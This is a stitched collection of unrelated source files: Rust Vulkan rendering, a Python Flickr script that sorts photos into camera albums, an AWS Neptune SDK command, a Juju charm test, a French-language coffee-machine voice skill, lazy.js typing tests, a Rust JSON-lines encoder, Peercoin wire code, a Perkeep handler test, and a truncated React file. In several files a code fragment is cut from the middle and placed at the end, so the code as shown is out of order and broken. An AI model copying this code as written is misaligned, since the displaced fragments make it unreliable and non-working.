[vk::PipelineStageFlags::COLOR_ATTACHMENT_OUTPUT]; let buffers = [command_buffer]; let signal_semaphores = [rendering_complete_semaphore]; let submit_info = vk::SubmitInfo::builder() .wait_semaphores(&wait_semaphores) .wait_dst_stage_mask(&masks) .command_buffers(&buffers) .signal_semaphores(&signal_semaphores) .build(); let infos = [submit_info]; match device.queue_submit(queue, &infos, graphics_fence) { Err(_) => return Err(String::from("failed to submit graphics command buffer")), _ => (), } let wait_semaphores = [rendering_complete_semaphore]; let swapchains = [swapchain]; let indices = [image_index]; let present_info = vk::PresentInfoKHR::builder() .wait_semaphores(&wait_semaphores) .swapchains(&swapchains) .image_indices(&indices); if let Err(err) = swapchain_loader.queue_present(queue, &present_info) { if err == vk::Result::SUBOPTIMAL_KHR || err == vk::Result::ERROR_OUT_OF_DATE_KHR { panic!("swapchain resized"); } else { return Err(String::from("failed to present")); } } } Ok(()) }
draw
cameras_to_albums.py
#!/usr/bin/env python """ A simple script to organize photos into albums named by their camera source. For me, this is useful for cycling through only high quality photos on my TV hooked up to a chromecast. """ import argparse import flickrapi def auth_flickr(api_key, api_secret): """Authenticate user to flickr API.""" flickr = flickrapi.FlickrAPI(api_key, api_secret, format='parsed-json') flickr.authenticate_via_browser(perms='write') return flickr def get_user_id(flickr, user): """Get the user_id from the username.""" user_data = flickr.people.findByUsername(username=user) return user_data['user']['id'] def get_photoset_dict(flickr, user_id): """construct a photoset dict of album name to album/set id.""" print('Gathering dictionary of all photos in all photosets...') init_photoset = flickr.photosets.getList(user_id=user_id) photoset_dict = dict() set_num = 1 for set_page in range(1, init_photoset['photosets']['pages'] + 1): photoset = flickr.photosets.getList(user_id=user_id, page=set_page) for pset in photoset['photosets']['photoset']: print('processing photoset %s of %s' % (set_num, init_photoset['photosets']['total'])) set_num += 1 # a_dict = {'thing': {'this': ['list, 'values']} } photoset_dict[pset['title']['_content']] = {pset['id']: []} init_photoset_object = flickr.photosets.getPhotos( photoset_id=pset['id']) for photoset_page in range(1, init_photoset_object['photoset']['pages'] + 1): photoset_object = flickr.photosets.getPhotos( user_id=user_id, photoset_id=pset['id'], page=photoset_page) photoset_dict[pset['title']['_content']][ pset['id']] += [p['id'] for p in photoset_object['photoset']['photo']] return photoset_dict def main(args): """Main code block. Do all the things.""" flickr = auth_flickr(args.api_key, args.api_secret) user_id = get_user_id(flickr, user=args.username) album_dict = get_photoset_dict(flickr, user_id) init_photos = flickr.people.getPhotos(user_id=user_id) total = init_photos['photos']['total'] photo_num = args.initial_photo / 100 * 100 # TODO ensure less than total photos if photo_num > total: raise('Trying to start at photo %s but only %s total. Exiting.' % (args.initial_photo, total)) init_page = args.initial_photo / 100 + 1 # 100 photos per page for page_num in range(init_page, init_photos['photos']['pages'] + 1): photo_batch = flickr.people.getPhotos(user_id=user_id, page=page_num) for photo in photo_batch['photos']['photo']: photo_num += 1 photo_id = photo['id'] print('processing photo %s of %s: %s' % (photo_num, total, photo_id)) photo_data = flickr.photos.getExif(photo_id=photo_id) camera_name = photo_data['photo']['camera'] if len(camera_name) > 0:
description='All photos taken behind a %s' % camera_name) album_dict[camera_name] = { new_set['photoset']['id']: [photo_id]} continue elif photo_id not in [p for p in album_dict[camera_name].values()[0]]: # if this photo is not in the appropriate album, add it print('Adding photo to camera album.') flickr.photosets.addPhoto(photoset_id=album_dict[ camera_name].keys()[0], photo_id=photo_id) album_dict[camera_name].values()[0].append(photo_id) else: print('Photo is already in the appropriate set') continue else: print('Skipping photo with insufficient metadata.') if __name__ in '__main__': parser = argparse.ArgumentParser() parser.add_argument('-d', '--dry_run', action='store_true', default=False, help="Verbose minus action. Default=False") parser.add_argument('-i', '--initial_photo', help='approximate initial photo. Rounds down to nearest hundred', type=int, default=0) parser.add_argument('-k', '--api_key', help='flickr API key', required=True) parser.add_argument('-s', '--api_secret', help='flickr API secret', required=True) parser.add_argument('-u', '--username', help='your flickr username', required=True) exit(main(parser.parse_args()))
if camera_name not in album_dict.keys(): print('adding camera album "%s"' % camera_name) new_set = flickr.photosets.create(title=camera_name, primary_photo_id=photo_id,
ResetDBParameterGroupCommand.ts
import { getSerdePlugin } from "@aws-sdk/middleware-serde"; import { HttpRequest as __HttpRequest, HttpResponse as __HttpResponse } from "@aws-sdk/protocol-http"; import { Command as $Command } from "@aws-sdk/smithy-client"; import { FinalizeHandlerArguments, Handler, HandlerExecutionContext, HttpHandlerOptions as __HttpHandlerOptions, MetadataBearer as __MetadataBearer, MiddlewareStack, SerdeContext as __SerdeContext, } from "@aws-sdk/types"; import { DBParameterGroupNameMessage, ResetDBParameterGroupMessage } from "../models/models_0"; import { NeptuneClientResolvedConfig, ServiceInputTypes, ServiceOutputTypes } from "../NeptuneClient"; import { deserializeAws_queryResetDBParameterGroupCommand, serializeAws_queryResetDBParameterGroupCommand, } from "../protocols/Aws_query"; export interface ResetDBParameterGroupCommandInput extends ResetDBParameterGroupMessage {} export interface ResetDBParameterGroupCommandOutput extends DBParameterGroupNameMessage, __MetadataBearer {} /** * <p>Modifies the parameters of a DB parameter group to the engine/system default value. To * reset specific parameters, provide a list of the following: <code>ParameterName</code> and * <code>ApplyMethod</code>. To reset the entire DB parameter group, specify the * <code>DBParameterGroup</code> name and <code>ResetAllParameters</code> parameters. When * resetting the entire group, dynamic parameters are updated immediately and static parameters * are set to <code>pending-reboot</code> to take effect on the next DB instance restart or * <code>RebootDBInstance</code> request.</p> * @example * Use a bare-bones client and the command you need to make an API call. * ```javascript * import { NeptuneClient, ResetDBParameterGroupCommand } from "@aws-sdk/client-neptune"; // ES Modules import * // const { NeptuneClient, ResetDBParameterGroupCommand } = require("@aws-sdk/client-neptune"); // CommonJS import * const client = new NeptuneClient(config); * const command = new ResetDBParameterGroupCommand(input); * const response = await client.send(command); * ``` * * @see {@link ResetDBParameterGroupCommandInput} for command's `input` shape. * @see {@link ResetDBParameterGroupCommandOutput} for command's `response` shape. * @see {@link NeptuneClientResolvedConfig | config} for NeptuneClient's `config` shape. * */ export class ResetDBParameterGroupCommand extends $Command< ResetDBParameterGroupCommandInput, ResetDBParameterGroupCommandOutput, NeptuneClientResolvedConfig > { // Start section: command_properties // End section: command_properties constructor(readonly input: ResetDBParameterGroupCommandInput) { // Start section: command_constructor super(); // End section: command_constructor } /** * @internal */ resolveMiddleware( clientStack: MiddlewareStack<ServiceInputTypes, ServiceOutputTypes>, configuration: NeptuneClientResolvedConfig, options?: __HttpHandlerOptions ): Handler<ResetDBParameterGroupCommandInput, ResetDBParameterGroupCommandOutput> { this.middlewareStack.use(getSerdePlugin(configuration, this.serialize, this.deserialize)); const stack = clientStack.concat(this.middlewareStack); const { logger } = configuration; const clientName = "NeptuneClient"; const commandName = "ResetDBParameterGroupCommand"; const handlerExecutionContext: HandlerExecutionContext = { logger, clientName, commandName, inputFilterSensitiveLog: ResetDBParameterGroupMessage.filterSensitiveLog, outputFilterSensitiveLog: DBParameterGroupNameMessage.filterSensitiveLog, }; const { requestHandler } = configuration; return stack.resolve( (request: FinalizeHandlerArguments<any>) =>
handlerExecutionContext ); } private serialize(input: ResetDBParameterGroupCommandInput, context: __SerdeContext): Promise<__HttpRequest> { return serializeAws_queryResetDBParameterGroupCommand(input, context); } private deserialize(output: __HttpResponse, context: __SerdeContext): Promise<ResetDBParameterGroupCommandOutput> { return deserializeAws_queryResetDBParameterGroupCommand(output, context); } // Start section: command_body_extra // End section: command_body_extra }
requestHandler.handle(request.request as __HttpRequest, options || {}),
test_charm.py
# Copyright 2021 Unicorn # See LICENSE file for licensing details. # # Learn more about testing at: https://juju.is/docs/sdk/testing import unittest from unittest import mock import charm from ops.model import Unit from ops.testing import Harness class TestCharm(unittest.TestCase): def assert_active_unit(self, unit: Unit): self.assertEqual(unit.status.name, "active") self.assertEqual(unit.status.message, "Unit is ready") class TestInitCharm(TestCharm): def test_init(self): """Test initialization of charm.""" harness = Harness(charm.PrometheusBindExporterOperatorCharm) harness.begin() self.assert_active_unit(harness.charm.unit) class TestCharmHooks(TestCharm): def patch(self, obj, method): """Mock the method.""" _patch = mock.patch.object(obj, method) mock_method = _patch.start() self.addCleanup(_patch.stop) return mock_method def setUp(self): self.harness = Harness(charm.PrometheusBindExporterOperatorCharm) self.addCleanup(self.harness.cleanup) self.harness.begin() # mock subprocess self.mock_subprocess = self.patch(charm, "subprocess") # mock getting private address mock_get_binding = self.patch(self.harness.model, "get_binding") mock_get_binding.return_value = self.mock_binding = mock.MagicMock() self.mock_binding.network.bind_address = "127.0.0.1" # mock fetch resource self.mock_fetch = self.patch(self.harness.model.resources, "fetch") self.mock_fetch.return_value = "prometheus-bind-exporter.snap" def _add_bind_exporter_relation(self): """Help function to add bind-exporter relation.""" relation_id = self.harness.add_relation("bind-exporter", "prometheus2") self.harness.add_relation_unit(relation_id, "prometheus2/0") return relation_id def test_manage_prometheus_bind_exporter_service(self):
def test_private_address(self): """Test help function to get private address.""" address = self.harness.charm.private_address self.assertEqual("127.0.0.1", address) def test_on_install(self): """Test install hook.""" exp_call = mock.call(["snap", "install", "--dangerous", "prometheus-bind-exporter.snap"]) self.harness.charm.on.install.emit() self.mock_fetch.assert_called_once_with("prometheus-bind-exporter") self.assertIn(exp_call, self.mock_subprocess.check_call.mock_calls) self.assert_active_unit(self.harness.charm.unit) def test_on_config_changed(self): """Test config-changed hook.""" # this will trigger self.harness.charm.on.config_changed.emit() self.harness.update_config({"exporter-listen-port": "9120", "exporter-stats-groups": "server"}) self.assertEqual(self.harness.charm._stored.listen_port, "9120") self.assertEqual(self.harness.charm._stored.stats_groups, "server") self.mock_subprocess.check_call.assert_called_once_with( ["snap", "set", "prometheus-bind-exporter", "web.listen-address=127.0.0.1:9120", "web.stats-groups=server"]) self.assert_active_unit(self.harness.charm.unit) def test_on_config_changed_with_bind_exporter_relation(self): """Test config-changed hook with existing bind-exporter relation.""" relation_id = self._add_bind_exporter_relation() self.harness.update_config({"exporter-listen-port": "9120"}) relation_data = self.harness.get_relation_data(relation_id, self.harness.charm.unit.name) self.assertDictEqual(relation_data, {"hostname": "127.0.0.1", "port": "9120"}) self.assert_active_unit(self.harness.charm.unit) def test_on_bind_exporter_relation_changed(self): """Test Prometheus relation changed hook.""" relation_id = self._add_bind_exporter_relation() # update relation -> trigger bind_exporter_relation_changed hook self.harness.update_relation_data(relation_id, "prometheus2/0", {}) relation_data = self.harness.get_relation_data(relation_id, self.harness.charm.unit.name) self.assertDictEqual(relation_data, {"hostname": "127.0.0.1", "port": "9119"}) self.assert_active_unit(self.harness.charm.unit) def test_on_prometheus_relation_departed(self): """Test Prometheus relation changed hook.""" relation_id = self._add_bind_exporter_relation() # remove relation -> trigger bind_exporter_departed hook self.harness.remove_relation(relation_id) self.assertEqual(0, len(self.harness.model.relations.get("bind-exporter"))) self.assert_active_unit(self.harness.charm.unit)
"""Test manage the prometheus-bind-exporter snap.""" self.harness.charm._manage_prometheus_bind_exporter_service() self.mock_subprocess.check_call.assert_called_once_with( ["snap", "set", "prometheus-bind-exporter", "web.listen-address=127.0.0.1:9119", "web.stats-groups=server,view,tasks"])
action-coffee.py
#!/usr/bin/env python2 # -*-: coding utf-8 -*- import ConfigParser from coffeehack.coffeehack import CoffeeHack from hermes_python.hermes import Hermes import io import Queue CONFIGURATION_ENCODING_FORMAT = "utf-8" CONFIG_INI = "config.ini" MQTT_IP_ADDR = "localhost" MQTT_PORT = 1883 MQTT_ADDR = "{}:{}".format(MQTT_IP_ADDR, str(MQTT_PORT)) class SnipsConfigParser(ConfigParser.SafeConfigParser): def to_dict(self): return {section: {option_name : option for option_name, option in self.items(section)} for section in self.sections()} def read_configuration_file(configuration_file): try: with io.open(configuration_file, encoding=CONFIGURATION_ENCODING_FORMAT) as f: conf_parser = SnipsConfigParser() conf_parser.readfp(f) return conf_parser.to_dict() except (IOError, ConfigParser.Error) as e: return dict() class Skill: def __init__(self): config = read_configuration_file("config.ini") extra = config["global"].get("extra", False) self.cafe = CoffeeHack(extra = extra) def extract_value(val): res = [] if val is not None: for r in val: res.append(r.slot_value.value.value) return res def extract_intensite_cafe(intent_message): return extract_value(intent_message.slots.intensite_cafe) def extract_nombre_cafe(intent_message):
def extract_type_cafe(intent_message): return extract_value(intent_message.slots.type_cafe) def extract_taille_cafe(intent_message): return extract_value(intent_message.slots.taille_cafe) def callback(hermes, intent_message): t = extract_type_cafe(intent_message) s = extract_taille_cafe(intent_message) ta = extract_intensite_cafe(intent_message) n = extract_nombre_cafe(intent_message) type_cafe = t[0] if len(t) else "" taille_cafe = s[0] if len(s) else "" intensite_cafe = ta[0] if len(ta) else "" number = 1 if len(n): try: number = int(n[0]) except ValueError, e: number = 2 print(t) print(s) print(ta) hermes.skill.cafe.verser(type_cafe = type_cafe, taille_cafe = taille_cafe, intensite_cafe = intensite_cafe, number = number) def cafe_io(hermes, intent_message): hermes.skill.cafe.cafe_io() def cafe_nettoie(hermes, intent_message): hermes.skill.cafe.nettoie() def cafe_vapeur(hermes, intent_message): hermes.skill.cafe.vapeur() if __name__ == "__main__": skill = Skill() with Hermes(MQTT_ADDR) as h: h.skill = skill h.subscribe_intent("segar:verser", callback) \ .subscribe_intent("segar:cafe_io", cafe_io) \ .subscribe_intent("nettoie", cafe_nettoie) \ .subscribe_intent("vapeur", cafe_vapeur) \ .loop_forever()
return extract_value(intent_message.slots.nombre_cafe)
lazy.js-tests.ts
/// <reference path="lazy.js.d.ts" /> // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - interface Foo { foo(): string; } interface Bar { bar(): string; } // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - var foo: Foo; var bar: Bar; var fooArr: Foo[]; var barArr: Bar[]; // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - var fooSequence: LazyJS.Sequence<Foo>; var barSequence: LazyJS.Sequence<Bar>; var fooArraySeq: LazyJS.ArrayLikeSequence<Foo>; var barArraySeq: LazyJS.ArrayLikeSequence<Bar>; var fooObjectSeq: LazyJS.ObjectLikeSequence<Foo>; var anyObjectSeq: LazyJS.ObjectLikeSequence<any>; var fooAsyncSeq: LazyJS.AsyncSequence<Foo>; var strSequence: LazyJS.Sequence<string>; var stringSeq: LazyJS.StringLikeSequence; var obj: Object; var bool: boolean; var num: number; var str: string; var x: any = null; var arr: any[]; var exp: RegExp; var strArr: string[]; var numArr: string[]; function fnCallback(): void { } function fnErrorCallback(error: any): void { } function fnValueCallback(value: Foo): void { } function fnGetKeyCallback(value: Foo): string { return str; } function fnTestCallback(value: Foo): boolean { return bool; } function fnMapCallback(value: Foo): Bar { return bar; } function fnMapStringCallback(value: string): string { return str; } function fnNumberCallback(value: Foo): number { return num; } function fnMemoCallback(memo: Bar, value: Foo): Bar { return bar; } function fnGeneratorCallback(index: number): Foo { return foo; } // Lazy fooArraySeq = Lazy(fooArr); fooObjectSeq = Lazy<Foo>({a: foo, b: foo}); anyObjectSeq = Lazy<any>({a: num, b: str}); stringSeq = Lazy(str); // Strict var Strict = Lazy.strict(); fooArraySeq = Strict([foo, foo]).pop(); // Sequence fooAsyncSeq = fooSequence.async(num); fooSequence = fooSequence.chunk(num); fooSequence = fooSequence.compact(); fooSequence = fooSequence.concat(arr); fooSequence = fooSequence.consecutive(num); bool = fooSequence.contains(foo); fooSequence = fooSequence.countBy(str); fooObjectSeq = fooSequence.countBy(fnGetKeyCallback); fooSequence = fooSequence.dropWhile(fnTestCallback); fooSequence = fooSequence.each(fnValueCallback); bool = fooSequence.every(fnTestCallback); fooSequence = fooSequence.filter(fnTestCallback); fooSequence = fooSequence.find(fnTestCallback); fooSequence = fooSequence.findWhere(obj); x = fooSequence.first(); fooSequence = fooSequence.first(num); fooSequence = fooSequence.flatten(); fooObjectSeq = fooSequence.groupBy(fnGetKeyCallback);
fooSequence = fooSequence.initial(num); fooSequence = fooSequence.intersection(arr); fooSequence = fooSequence.invoke(str); bool = fooSequence.isEmpty(); str = fooSequence.join(); str = fooSequence.join(str); foo = fooSequence.last(); fooSequence = fooSequence.last(num); fooSequence = fooSequence.lastIndexOf(foo); barSequence = fooSequence.map(fnMapCallback); foo = fooSequence.max(); foo = fooSequence.max(fnNumberCallback); foo = fooSequence.min(); foo = fooSequence.min(fnNumberCallback); fooSequence = fooSequence.pluck(str); bar = fooSequence.reduce(fnMemoCallback); bar = fooSequence.reduce(fnMemoCallback, bar); bar = fooSequence.reduceRight(fnMemoCallback, bar); fooSequence = fooSequence.reject(fnTestCallback); fooSequence = fooSequence.rest(num); fooSequence = fooSequence.reverse(); fooSequence = fooSequence.shuffle(); bool = fooSequence.some(); bool = fooSequence.some(fnTestCallback); fooSequence = fooSequence.sortBy(fnNumberCallback); fooSequence = fooSequence.sortedIndex(foo); fooSequence = fooSequence.sum(); fooSequence = fooSequence.sum(fnNumberCallback); fooSequence = fooSequence.takeWhile(fnTestCallback); fooSequence = fooSequence.union(fooArr); fooSequence = fooSequence.uniq(); fooSequence = fooSequence.where(obj); fooSequence = fooSequence.without(fooArr); fooSequence = fooSequence.zip(arr); fooArr = fooSequence.toArray(); obj = fooSequence.toObject(); // ArrayLikeSequence fooArraySeq = fooArraySeq.concat(); fooArraySeq = fooArraySeq.first(); fooArraySeq = fooArraySeq.first(num); foo = fooArraySeq.get(num); num = fooArraySeq.length(); barArraySeq = fooArraySeq.map(fnMapCallback); fooArraySeq = fooArraySeq.pop(); fooArraySeq = fooArraySeq.rest(); fooArraySeq = fooArraySeq.rest(num); fooArraySeq = fooArraySeq.reverse(); fooArraySeq = fooArraySeq.shift(); fooArraySeq = fooArraySeq.slice(num); fooArraySeq = fooArraySeq.slice(num, num); // ObjectLikeSequence fooObjectSeq = fooObjectSeq.defaults(obj); fooSequence = fooObjectSeq.functions(); fooObjectSeq = fooObjectSeq.get(str); fooObjectSeq = fooObjectSeq.invert(); strSequence = fooObjectSeq.keys(); fooObjectSeq = fooObjectSeq.omit(strArr); fooSequence = fooObjectSeq.pairs(); fooObjectSeq = fooObjectSeq.pick(strArr); arr = fooObjectSeq.toArray(); obj = fooObjectSeq.toObject(); fooSequence = fooObjectSeq.values(); // StringLikeSequence str = stringSeq.charAt(num); num = stringSeq.charCodeAt(num); bool = stringSeq.contains(str); bool = stringSeq.endsWith(str); str = stringSeq.first(); stringSeq = stringSeq.first(num); num = stringSeq.indexOf(str); num = stringSeq.indexOf(str, num); str = stringSeq.last(); stringSeq = stringSeq.last(num); num = stringSeq.lastIndexOf(str); num = stringSeq.lastIndexOf(str, num); stringSeq = stringSeq.mapString(fnMapStringCallback); stringSeq = stringSeq.match(exp); stringSeq = stringSeq.reverse(); stringSeq = stringSeq.split(str); stringSeq = stringSeq.split(exp); bool = stringSeq.startsWith(str); stringSeq = stringSeq.substring(num); stringSeq = stringSeq.substring(num, num); stringSeq = stringSeq.toLowerCase(); stringSeq = stringSeq.toUpperCase();
fooSequence = fooSequence.indexOf(x); fooSequence = fooSequence.initial();
mod.rs
use bytes::{BufMut, Bytes, BytesMut}; use futures::{sink::Sink, SinkExt}; use serde::Serialize; use serde_json; use std::io; use tokio::io::{ AsyncBufReadExt, AsyncRead, AsyncWrite, AsyncWriteExt, BufReader, BufWriter, Lines, }; use tokio_util::codec::{Encoder, FramedWrite}; pub mod diff; pub mod http_interaction; pub mod spec_chunks; pub mod spec_events; pub struct JsonLineEncoder { delimeter: Bytes, first: bool, } impl Default for JsonLineEncoder { fn default() -> Self
} impl JsonLineEncoder { fn new(delimeter: &[u8]) -> Self { Self { delimeter: Bytes::copy_from_slice(delimeter), first: true, } } } impl<T> Encoder<T> for JsonLineEncoder where T: Serialize, { type Error = JsonLineEncoderError; fn encode(&mut self, item: T, buf: &mut BytesMut) -> Result<(), Self::Error> { let json = serde_json::to_string(&item)?; buf.reserve(json.len() + self.delimeter.len()); if self.first { self.first = false; } else { buf.put(&self.delimeter[..]); } buf.put(json.as_bytes()); Ok(()) } } #[derive(Debug, thiserror::Error)] pub enum JsonLineEncoderError { #[error("json serialisation error: {}", .0)] Json(serde_json::Error), #[error("io error: {}", .0)] Io(io::Error), } impl From<io::Error> for JsonLineEncoderError { fn from(err: io::Error) -> JsonLineEncoderError { JsonLineEncoderError::Io(err) } } impl From<serde_json::Error> for JsonLineEncoderError { fn from(err: serde_json::Error) -> JsonLineEncoderError { JsonLineEncoderError::Json(err) } } pub async fn write_to_json_lines<'a, S, I>( sink: S, items: impl IntoIterator<Item = &'a I>, ) -> Result<(), &'static str> where S: AsyncWrite, S: Unpin, I: Serialize, I: 'a, // E: Unpin { let mut framed_write = into_json_lines::<S, I>(sink); for item in items { if let Err(_) = framed_write.send(item).await { panic!("could not send json line to sink"); // TODO: Find way to actually write error info } } Ok(()) } // TODO: return a proper error, so downstream can distinguish between IO, serde, etc // TODO: make this work with impl Stream instead pub async fn write_to_json_array<'a, S, I>( sink: S, items: impl IntoIterator<Item = &'a I>, ) -> Result<(), JsonLineEncoderError> where S: AsyncWrite, S: Unpin, I: Serialize, I: 'a, // E: Unpin { let mut framed_write = into_json_array_items(sink); framed_write.get_mut().write_u8(b'[').await?; for item in items { if let Err(_) = framed_write.send(item).await { panic!("could not send json array item to sink"); // TODO: Find way to actually write error info } } framed_write.get_mut().write_u8(b']').await?; framed_write.get_mut().flush().await?; Ok(()) } pub fn into_json_lines<S, I>(sink: S) -> FramedWrite<BufWriter<S>, JsonLineEncoder> where S: AsyncWrite, I: Serialize, { let writer = BufWriter::new(sink); let codec = JsonLineEncoder::new(b"\n"); FramedWrite::new(writer, codec) } pub fn into_json_array_items<S>(sink: S) -> FramedWrite<BufWriter<S>, JsonLineEncoder> where S: AsyncWrite, { let writer = BufWriter::new(sink); let codec = JsonLineEncoder::new(b"\n,"); FramedWrite::new(writer, codec) }
{ Self { delimeter: Bytes::from_static(b"\n"), first: true, } }
msgversion.go
// Copyright (c) 2013-2016 The btcsuite developers // Use of this source code is governed by an ISC // license that can be found in the LICENSE file. package wire import ( "bytes" "fmt" "io" "strings" "time" ) // MaxUserAgentLen is the maximum allowed length for the user agent field in a // version message (MsgVersion). const MaxUserAgentLen = 256 // DefaultUserAgent for wire in the stack const DefaultUserAgent = "/ppcwire:0.5.0/" // MsgVersion implements the Message interface and represents a bitcoin version // message. It is used for a peer to advertise itself as soon as an outbound // connection is made. The remote peer then uses this information along with // its own to negotiate. The remote peer must then respond with a version // message of its own containing the negotiated values followed by a verack // message (MsgVerAck). This exchange must take place before any further // communication is allowed to proceed. type MsgVersion struct { // Version of the protocol the node is using. ProtocolVersion int32 // Bitfield which identifies the enabled services. Services ServiceFlag // Time the message was generated. This is encoded as an int64 on the wire. Timestamp time.Time // Address of the remote peer. AddrYou NetAddress // Address of the local peer. AddrMe NetAddress // Unique value associated with message that is used to detect self // connections. Nonce uint64 // The user agent that generated messsage. This is a encoded as a varString // on the wire. This has a max length of MaxUserAgentLen. UserAgent string // Last block seen by the generator of the version message. LastBlock int32 // Don't announce transactions to peer. DisableRelayTx bool } // HasService returns whether the specified service is supported by the peer // that generated the message. func (msg *MsgVersion) HasService(service ServiceFlag) bool { return msg.Services&service == service } // AddService adds service as a supported service by the peer generating the // message. func (msg *MsgVersion) AddService(service ServiceFlag) { msg.Services |= service } // BtcDecode decodes r using the bitcoin protocol encoding into the receiver. // The version message is special in that the protocol version hasn't been // negotiated yet. As a result, the pver field is ignored and any fields which // are added in new versions are optional. This also mean that r must be a // *bytes.Buffer so the number of remaining bytes can be ascertained. // // This is part of the Message interface implementation. func (msg *MsgVersion) BtcDecode(r io.Reader, pver uint32, enc MessageEncoding) error { buf, ok := r.(*bytes.Buffer) if !ok { return fmt.Errorf("MsgVersion.BtcDecode reader is not a " + "*bytes.Buffer") } err := readElements(buf, &msg.ProtocolVersion, &msg.Services, (*int64Time)(&msg.Timestamp)) if err != nil { return err } err = readNetAddress(buf, pver, &msg.AddrYou, false) if err != nil { return err } // Protocol versions >= 106 added a from address, nonce, and user agent // field and they are only considered present if there are bytes // remaining in the message. if buf.Len() > 0 { err = readNetAddress(buf, pver, &msg.AddrMe, false) if err != nil { return err } } if buf.Len() > 0 { err = readElement(buf, &msg.Nonce) if err != nil { return err } } if buf.Len() > 0 { userAgent, err := ReadVarString(buf, pver) if err != nil { return err } err = validateUserAgent(userAgent) if err != nil { return err } msg.UserAgent = userAgent } // Protocol versions >= 209 added a last known block field. It is only // considered present if there are bytes remaining in the message. if buf.Len() > 0 { err = readElement(buf, &msg.LastBlock) if err != nil { return err } } /* Peercoin - bloom filters not supported // There was no relay transactions field before BIP0037Version, but // the default behavior prior to the addition of the field was to always // relay transactions. if buf.Len() > 0 { // It's safe to ignore the error here since the buffer has at // least one byte and that byte will result in a boolean value // regardless of its value. Also, the wire encoding for the // field is true when transactions should be relayed, so reverse // it for the DisableRelayTx field. var relayTx bool readElement(r, &relayTx) msg.DisableRelayTx = !relayTx } */ return nil } // BtcEncode encodes the receiver to w using the bitcoin protocol encoding. // This is part of the Message interface implementation. func (msg *MsgVersion) BtcEncode(w io.Writer, pver uint32, enc MessageEncoding) error { err := validateUserAgent(msg.UserAgent) if err != nil { return err } err = writeElements(w, msg.ProtocolVersion, msg.Services, msg.Timestamp.Unix()) if err != nil { return err } err = writeNetAddress(w, pver, &msg.AddrYou, false) if err != nil { return err } err = writeNetAddress(w, pver, &msg.AddrMe, false) if err != nil { return err } err = writeElement(w, msg.Nonce) if err != nil { return err } err = WriteVarString(w, pver, msg.UserAgent) if err != nil { return err } err = writeElement(w, msg.LastBlock) if err != nil { return err } /* Peercoin - bloom filters not supported // There was no relay transactions field before BIP0037Version. Also, // the wire encoding for the field is true when transactions should be // relayed, so reverse it from the DisableRelayTx field. if pver >= BIP0037Version { err = writeElement(w, !msg.DisableRelayTx) if err != nil { return err } } */ return nil } // Command returns the protocol command string for the message. This is part // of the Message interface implementation. func (msg *MsgVersion) Command() string { return CmdVersion } // MaxPayloadLength returns the maximum length the payload can be for the // receiver. This is part of the Message interface implementation. func (msg *MsgVersion) MaxPayloadLength(pver uint32) uint32 { // XXX: <= 106 different // Protocol version 4 bytes + services 8 bytes + timestamp 8 bytes + // remote and local net addresses + nonce 8 bytes + length of user // agent (varInt) + max allowed useragent length + last block 4 bytes + // relay transactions flag 1 byte. return 33 + (maxNetAddressPayload(pver) * 2) + MaxVarIntPayload + MaxUserAgentLen } // NewMsgVersion returns a new bitcoin version message that conforms to the // Message interface using the passed parameters and defaults for the remaining // fields. func NewMsgVersion(me *NetAddress, you *NetAddress, nonce uint64, lastBlock int32) *MsgVersion { // Limit the timestamp to one second precision since the protocol // doesn't support better. return &MsgVersion{ ProtocolVersion: int32(ProtocolVersion), Services: 0, Timestamp: time.Unix(time.Now().Unix(), 0), AddrYou: *you, AddrMe: *me, Nonce: nonce, UserAgent: DefaultUserAgent, LastBlock: lastBlock, DisableRelayTx: false, } } // validateUserAgent checks userAgent length against MaxUserAgentLen func validateUserAgent(userAgent string) error { if len(userAgent) > MaxUserAgentLen { str := fmt.Sprintf("user agent too long [len %v, max %v]", len(userAgent), MaxUserAgentLen) return messageError("MsgVersion", str) } return nil } // AddUserAgent adds a user agent to the user agent string for the version // message. The version string is not defined to any strict format, although // it is recommended to use the form "major.minor.revision" e.g. "2.6.41". func (msg *MsgVersion) AddUserAgent(name string, version string, comments ...string) error { newUserAgent := fmt.Sprintf("%s:%s", name, version) if len(comments) != 0 { newUserAgent = fmt.Sprintf("%s(%s)", newUserAgent, strings.Join(comments, "; ")) } newUserAgent = fmt.Sprintf("%s%s/", msg.UserAgent, newUserAgent) err := validateUserAgent(newUserAgent) if err != nil { return err }
}
msg.UserAgent = newUserAgent return nil
handler_test.go
/* Copyright 2014 The Perkeep Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package thumbnail import ( "io/ioutil" "net/http" "net/http/httptest" "testing" "perkeep.org/pkg/blob" "perkeep.org/pkg/schema" "perkeep.org/pkg/test" ) func TestHandlerWrongRef(t *testing.T) { storage := new(test.Fetcher) ref := blob.MustParse("sha1-f1d2d2f924e986ac86fdf7b36c94bcdf32beec15") wrongRefString := "sha1-e242ed3bffccdf271b7fbaf34ed72d089537b42f" ts := httptest.NewServer(createVideothumbnailHandler(ref, storage)) defer ts.Close() resp, err := http.Get(ts.URL + "/" + wrongRefString) if err != nil { t.Fatal(err) } if resp.StatusCode != 403 { t.Fatalf("excepted forbidden status when the wrong ref is requested") } } func TestHandlerRightRef(t *testing.T) { b := test.Blob{Contents: "Foo"} storage := new(test.Fetcher) ref, err := schema.WriteFileFromReader(storage, "", b.Reader()) if err != nil { t.Fatal(err) } if err != nil { t.Fatal(err) } ts := httptest.NewServer(createVideothumbnailHandler(ref, storage)) defer ts.Close() resp, err := http.Get(ts.URL + "/" + ref.String()) if err != nil { t.Fatal(err)
t.Fatalf("expected 200 status: %v", resp) } content, err := ioutil.ReadAll(resp.Body) if err != nil { t.Fatal(err) } if string(content) != b.Contents { t.Errorf("excepted handler to serve data") } }
} if resp.StatusCode != 200 {
applicantList.js
import React from 'react'; import { Table, Modal, Divider} from 'antd'; import { Link } from 'gatsby'; import { I18n } from 'aws-amplify'; import * as Util from '../../test/jobDescriptionUnitTest/jobDescriptionUtil'; const { Column } = Table; class
